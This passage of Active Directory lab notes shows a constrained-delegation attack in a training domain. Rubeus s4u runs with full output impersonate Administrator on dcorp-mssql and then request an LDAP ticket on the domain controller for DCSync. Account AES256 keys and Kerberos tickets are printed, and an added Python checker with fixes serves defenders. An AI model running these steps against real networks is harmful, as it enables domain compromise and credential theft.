OJIPcp/0bC8jZwrW3qjxTBlS/khoiJYtooibmhDoXIa/BCkhODLM+kv/crNtDnp0mEiTK3z5hWSDEXl9
vi2M6XDNg3FxzLTTeNhZfpYdY8M7Q8DCBCJ9OtLTJ0THW0Ds9O+g2Tb27R22NML68KDGl4kyICgZoJCn
OQpwX0jwZLqAOLBYuhwAbtRcgVC3AbLi2Sjacl1Vr4j5RJRsQ9IapPq50LzRY40rPyFiFCm9b7meYRFM
/OTJ6e+l6sG51bkBuBcRM2cVci4/Ru2GO7sUr30P7NUGvgVGT2ntFsSB+wpH3haIz/5CaC6jvKiDs5eC
XSLwNkSY31jrvCkEBB+QoKG/6GBqJh6RgvZpEzsIxPEGR8j4Qb2d6j2MyDnzzYcuoLzOxFv8+QRaI4Kz
No3sf8WJlK2NOvCjggETMIIBD6ADAgEAooIBBgSCAQJ9gf8wgfyggfkwgfYwgfOgGzAZoAMCARGhEgQQ
pCCk9mZsYIQLVng2IUCTNqEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8b
DUFkbWluaXN0cmF0b3KjBwMFAEChAAClERgPMjAyNDA3MDMxNjE4MDhaphEYDzIwMjQwNzA0MDIxODA3
WqcRGA8yMDI0MDcxMDE2MTgwN1qoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypOjA4oAMCAQKh
MTAvGwVycGNzcxsmZGNvcnAtbXNzcWwuZG9sbGFyY29ycC5tb25leWNvcnAuTE9DQUw=
[+] Ticket successfully imported!

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe s4u /user:websvc
/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
/impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL
/altservice:host /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF5jCCBeKgAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BFswggRXoAMCARKhAwIBAqKCBEkEggRFX/AouVoTyiyz3Sec8lWxWIIMIlL3u3KiH5naVxQEdY2eofCZ
ZAPG4lskjsVSfvQ91j0q1Lvb1SREG99FT1vd6vC0+r4YHtGWfnkjsKqyvxUlPGopRCbVVhL+bRNb4JID
fxEZkgnmfKTxvxaOF8Be2HmDzRJb7icWfk0lqhEaRQqHrHax+NU/zU0FuHYRjraLgwVR3755DPv1WXTA
Vhn0+w4JNHdHteKRW1M6u6Tg0JSt0cUlW6yPe8rYuA7cQmsjMU+2UVdSguWsgwVMjNZmIRs3Sg8HUnd+
xJWxNQusgH7CRGyZ7BcO95a0/rLyiL24JgQxR+dEjZ4+rn1WNG2KA+DKZs0rIIAWeix1Tblh2tMqQeWQ
OL1qYGNErX2iZuNo+OhHsB7sVWq5o4eg1rIW/dV5avVxGYr5ZwgjOVi6VzWjFYI0WO+xxanhtd5XrUeh
YoByJ6VAOOg4hrV8YNFPx3wBdVnZ8vMhntb/hm6w94LES+l3Uj6Im4G/GQZct80ICzLGuhZiFfpQf74C
FfA0YVrZ2cNmTE7BGj00Y98rhhYk4MgRBMS6KwtBPgQW95uovqD6RfrupzYAHyiaXDts7NNphDupAFrM
gPUV8wlkJt+IbZ0j141iTaiEKtkZKMfNaxQnTwF+nKasTrvTwqv3S2b49KoamgaemTstRt5iNpWCoFWL
WkxWSAO3aGutcMC6MB2qn5O4uDoEnhigUSitx+gYv8NFt8bIAzXkMmDWcCL9L46Lo5jSasTgmqsxeJ6Q
KiNX/HrQIVPApCs4E8x1aDZNN0DZ9gg2DMDwW3igm4rsi5g/spWVhb08cfvkDtnbVBz3cm58aCn62aVO
vfVKZrqYK6op2YXDMRYiiOvW6/az6BwAX9PGlho5uVV5Ockep1euDYyx4dSB24aeHmWjdEQhancwcIrK
9lEmLxTU9efepIyKMjD/pNC2a6ZSPJaKFEX+xOwSi85+kHawbp2w9cSSnVt6mfGxhZMsTSv7fmMqlN88
pUVeM25Mm5ETBPQqPeXkPXYL0upq3y4XXmL1yZ0Ejl9XCniNtHP3pIv9Pm7l3+NQr8qV9RvT1cJfCQuY
9T8hWx0ZlA0SRg487CKFuNox8tm3D4bt2KwSOEdrdbVwXThR7q1HoBNei6w0AJnq+a4EymivbtPrwxWB
5hXY3cwiSNlJnps70rNtI/noLyHomeBXDtYaPM5KMU39LyRYTiwfth9pNDOFSJHM67wGzNskSMB/64Ve
hrA6qitaFl6jNvbDd/6z0nc7n2kTPv1MSA3M0b7lZnnAcdlcl3dbANgDgccv/fqKSw0yXUKO7Yh2oqxT
GIwR0bedcHq/MKJciiI/p6il57iVG2IAf2j7YDLV+NWK5XJ0fWRF58MswUH8P2koR2WFvwkBJUHeSxzX
Dx+gaHQ6VzB3SKw/49r3/JMv/c2KeqtQZs5692IXcH7CutpUW6OCAREwggENoAMCAQCiggEEBIIBAH2B
/TCB+qCB9zCB9DCB8aArMCmgAwIBEqEiBCDAQIHtB7q4qppMnf9RwSfurIIWEzwfmdCZgSu09Ou5bKEc
GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKITMBGgAwIBAaEKMAgbBndlYnN2Y6MHAwUAQOEAAKUR
GA8yMDI0MDcwMzE2MjAwMFqmERgPMjAyNDA3MDQwMjIwMDBapxEYDzIwMjQwNzEwMTYyMDAwWqgcGxpE
T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaZG9sbGFyY29ycC5t
b25leWNvcnAubG9jYWw=

[*] Action: S4U

[*] Building S4U2self request for: 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
[*] base64(ticket.kirbi):

doIGTDCCBkigAwIBBaEDAgEWooIFPjCCBTphggU2MIIFMqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMohMwEaADAgEBoQowCBsGd2Vic3Zjo4IE9jCCBPKgAwIBF6EDAgECooIE5ASCBODR2e4p
heXQx9H7PQuAZISTOxMc9FUZV8dBEaZcRtwNgiJNLuQz51zW/sFYDZTs1kH+GjPbHGYWvyY2zQfS964z
I93O5S/Wvr+jNiICHjHkT4Y4HimuQFvuvfgVrSTBRrjztAcb6qqHghrWpyGluanHlJANw6biVNrxRuv8
AaUzzH5aJWnvMJxbS3mMecwwpDZ2RWkk8STXKXzh7KyMuyOUkfonIZMKEulMTwFYvt/dm260t05S4cF8
Ka6zd2BIUrafxvWCoksWB83iYYCvK7e5KW5fW2c6rZaMAh8vWWxqxhnjdMe2RzC2yIsWKCJDK4jfWp+y
kDNrRTtNpCAoAvS/osSewO8yBDtUgRNekae+ngFTI7cls5Ve2pLH9uFVRotBPKK/MZocVstw5wALeGcb
Xqtf8WSfnqa/JJ8tXg3Y4SxhffPfhUMEtU8Z3E3zJVSIE/6y4wIKOLwn/5XvS7UPUSTs6gBCSePFbnGe
/UDCiHsOi89B2aC2RiEpBlwiUHuBEMShn6FRTHvmiLR334Bi8KrYfS3SDgWB7TTo+gxxB5R0k4Z+EU8N
oc7yYvHrjmxyz+hLGZNV9TmGstbm6RzHvG0GYrS3i4t6G2nw0bwBC1BdL97KXjJoab2n7vplZLrNtnET
+Lefxs7d7dLS0H1qXlNLSTZ6mwhQw+8617zonDtWPgt39hMGGILjLib+wQCcXXldk0Pg8J+0g9WxqdD8
FTksMRiO6cN1VTtfVFNegop4kVfVNNO+A8q1khhF+a7mIQBQm+y/+RRpKqkmpqzBmzLPbYIEXhSV2WhM
8jmxd6Wu6Nu55Pgzly2SxibJTgn5zvEUV/3YveGS9f+E5d+DFk6S8C70B1cPmEZ84gf5qMPowndozexy
w4xa303IhY6aFYMHdNRDl/o+iPLAuvYd3lmf757WvDVqYx99uLToF8ZTxE0CiLGgARPXRzU1QZacOAhI
Q0H6NGqgBaoAdlIR1eE1VML2AVp77QQEr8ee2aJUS4K2i0irDNwGv2RG7/O7QpQrdkWXeHYy3rxheDw4
7ly53+AUUXCWMdlU6wHqPzeeGztwVXNbIPHRoffc5TgKABxuAczPXhvekD7OLczjQazmOjsH2wChwW5x
8oS2tINWopDnIVvDP24soyvhUChjHDxjyCIVhj50jhYTEuyG9lUw/HZgHTIz/SYfK9RMKbT+ldA37MVI
cPjxjqybewvUnyY8gtY7s1Vm1k4u2v698gmGow/lBoHGCcsvi/LfvP2Xd+WjWclKDH3Ti2NRBdsjfm/+
1Ov8RB4BHyMIiOj6cB+SBl8TxFPbgDB/tTvfQjllEu1c4BZASBHo0Yij5Pw3kku95Ubf3DXlp6iPzOGe
gpLEwknbXyBBfGs5IUQtOE94YgCfV818adBGIQfQkhmr9adDWae2qC9ijyc4KF8Vzw9Io+p8zo8pPMjL
00bCUshSuuIXPPpZZZKTSYdimZ4Fj5shBjS6L29+1zM9A5hvm9ycLusbYdxyOrEDjpC8QaHIvWQ2zf/K
nW6+igVn3yrcqb8w6cD++cuPxCW+okfk16lzXiS36qJ5FHI0jLmU36Kk99ZfHe00MLrxfzqQMIzDpAp1
7gK6sSRNPfJHXsdG+mcc2CGOYoJYFdrwMUvFWgvR+SLTJM6Ijr/D6POZhjujgfkwgfagAwIBAKKB7gSB
632B6DCB5aCB4jCB3zCB3KArMCmgAwIBEqEiBCCzPgWwD+J5ZLKmetrpuuxZAW2zcSTAjfaYzVprVFhj
OaEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3Kj
BwMFAEChAAClERgPMjAyNDA3MDMxNjIwMDBaphEYDzIwMjQwNzA0MDIyMDAwWqcRGA8yMDI0MDcxMDE2
MjAwMFqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypEzARoAMCAQGhCjAIGwZ3ZWJzdmM=

[*] Impersonating user 'Administrator' to target SPN 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Final ticket will be for the alternate service 'host'
[*] Building S4U2proxy request for service: 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'host'
[*] base64(ticket.kirbi) for SPN 'host/dcorp-mssql.dollarcorp.moneycorp.LOCAL':

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
[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x847a8

Cached Tickets: (5)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: host/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/3/2024 9:20:00 (local)
End Time: 7/3/2024 19:20:00 (local)
Renew Time: 7/10/2024 9:20:00 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

#1> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: rpcss/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/3/2024 9:18:08 (local)
End Time: 7/3/2024 19:18:07 (local)
Renew Time: 7/10/2024 9:18:07 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

#2> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: http/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/3/2024 9:18:00 (local)
End Time: 7/3/2024 19:17:59 (local)
Renew Time: 7/10/2024 9:17:59 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

#3> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/3/2024 8:33:39 (local)
End Time: 7/3/2024 18:33:38 (local)
Renew Time: 7/10/2024 8:33:38 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>Powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-mssql.dollarcorp.moneycorp.LOCAL -ScriptBlock { $env:username;$env:computername }
Administrator
DCORP-MSSQL

Using dcorp-adminsrv$

PS C:\Windows\system32> Get-DomainComputer -TrustedToAuth

pwdlastset : 11/11/2022 11:16:12 PM
logoncount : 80
badpasswordtime : 5/18/2024 3:13:09 AM
distinguishedname : CN=DCORP-ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 6/26/2024 9:02:25 PM
whencreated : 11/12/2022 7:16:12 AM
samaccountname : DCORP-ADMINSRV$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
whenchanged : 6/27/2024 4:02:25 AM
accountexpires : NEVER
countrycode : 0
operatingsystem : Windows Server 2022 Datacenter
instancetype : 4
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION
objectguid : 2e036483-7f45-4416-8a62-893618556370
operatingsystemversion : 10.0 (20348)
lastlogoff : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto : {TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL, TIME/dcorp-DC}
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/15/2022 4:16:45 AM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {WSMAN/dcorp-adminsrv, WSMAN/dcorp-adminsrv.dollarcorp.moneycorp.local, TERMSRV/DCORP-ADMINSRV, TERMSRV/dcorp-adminsrv.dollarcorp.moneycorp.local...}
usncreated : 13891
usnchanged : 1164786
lastlogon : 7/3/2024 8:38:27 AM
badpwdcount : 0
cn : DCORP-ADMINSRV
msds-supportedencryptiontypes : 28
objectsid : S-1-5-21-719815819-3726368948-3917688648-1105
primarygroupid : 515
iscriticalsystemobject : False
name : DCORP-ADMINSRV
dnshostname : dcorp-adminsrv.dollarcorp.moneycorp.local

If we can compromise the machine account of DCORP-ADMINSRV, we can access the TIME service on the
machine dcorp-dc.dollarcorp.moneycorp.local as any user, including a domain admin. We have already
obtained the hashes of the dcorp-adminsrv machine account.

As already mentioned, only the delegation privilege is checked, not the service, so we will use the
/altservice flag in Rubeus to obtain a ticket for the LDAP service on dcorp-dc.dollarcorp.moneycorp.local.
Once we have a TGS for LDAP on the domain controller we can execute the DCSync attack.

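The defender's reading of the same point, as an added example that is not part of the lab notes or of PowerView: because the service class in msDS-AllowedToDelegateTo is not enforced, the question to ask of every account trusted for constrained delegation is which hosts it can reach and whether any of them is a domain controller, since a DC target means LDAP is reachable too. The Python below evaluates that over records shaped like the Get-DomainComputer output above. The DCORP-ADMINSRV$ record is taken from that output, the websvc record uses the CIFS/dcorp-mssql SPN from the earlier S4U runs with an assumed userAccountControl value, and plainsrv$ is a constructed control case; the DC host names are those of dcorp-dc as used throughout this section.

```python
# Added example, not from the lab notes or from PowerView: rate accounts that
# are trusted for constrained delegation by what their tickets can reach.

# userAccountControl bits (Microsoft-documented values)
TRUSTED_FOR_DELEGATION = 0x80000             # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition
WORKSTATION_TRUST_ACCOUNT = 0x1000
NORMAL_ACCOUNT = 0x200

def parse_spn(spn):
    """Split 'class/host[:port][/name]' into (class, host), both lower-cased."""
    service, _, rest = spn.partition("/")
    host = rest.split("/", 1)[0].split(":", 1)[0]
    return service.lower(), host.lower()

def assess_delegation(accounts, dc_hosts):
    """For each delegating account report the hosts it can reach, whether it may
    impersonate arbitrary users (protocol transition) and which targets are DCs.
    The service class is ignored on purpose: it is not checked when the ticket is
    used, so any SPN on a DC is effectively LDAP on that DC (a DCSync path)."""
    dc_hosts = {h.lower() for h in dc_hosts}
    findings = []
    for acct in accounts:
        uac = acct["useraccountcontrol"]
        targets = acct.get("msds-allowedtodelegateto") or []
        if not targets and not uac & TRUSTED_FOR_DELEGATION:
            continue                          # no delegation configured at all
        hosts = sorted({parse_spn(spn)[1] for spn in targets})
        findings.append({
            "account": acct["samaccountname"],
            "unconstrained": bool(uac & TRUSTED_FOR_DELEGATION),
            "protocol_transition": bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION),
            "hosts": hosts,
            "dc_targets": [h for h in hosts if h in dc_hosts],
        })
    return findings

# Constructed input: DCORP-ADMINSRV$ mirrors the Get-DomainComputer output above,
# websvc reuses the SPN from the S4U runs (its UAC value is an assumption),
# plainsrv$ is a made-up account with no delegation at all.
SAMPLE_ACCOUNTS = [
    {"samaccountname": "DCORP-ADMINSRV$",
     "useraccountcontrol": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msds-allowedtodelegateto": ["TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL", "TIME/dcorp-DC"]},
    {"samaccountname": "websvc",
     "useraccountcontrol": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,   # assumption
     "msds-allowedtodelegateto": ["CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL"]},
    {"samaccountname": "plainsrv$",                                           # constructed
     "useraccountcontrol": WORKSTATION_TRUST_ACCOUNT, "msds-allowedtodelegateto": []},
]
# Domain controller of dollarcorp as it appears in this section, short and FQDN form.
DC_HOSTS = {"dcorp-dc", "dcorp-dc.dollarcorp.moneycorp.local"}

def dcsync_paths(accounts=SAMPLE_ACCOUNTS, dc_hosts=DC_HOSTS):
    """Accounts whose delegation reaches a DC while protocol transition is enabled."""
    return [f["account"] for f in assess_delegation(accounts, dc_hosts)
            if f["dc_targets"] and f["protocol_transition"]]

if __name__ == "__main__":
    for finding in assess_delegation(SAMPLE_ACCOUNTS, DC_HOSTS):
        print(finding)
    print("DCSync paths:", dcsync_paths())
```

Any account that dcsync_paths() returns should be protected like a Domain Admin credential. The fixes are to remove or narrow msDS-AllowedToDelegateTo so that no DC is a target, to clear TRUSTED_TO_AUTH_FOR_DELEGATION wherever protocol transition is not required, and to mark privileged accounts as sensitive and cannot be delegated (or add them to Protected Users) so that S4U2self/S4U2proxy requests naming them fail.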
C:\Windows\system32>c:\Ad\Tools\Rubeus.exe s4u /user:DCORP-ADMINSRV$
/aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
/impersonateuser:Administrator /msdsspn:TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:LDAP
/ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\DCORP-ADMINSRV$'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
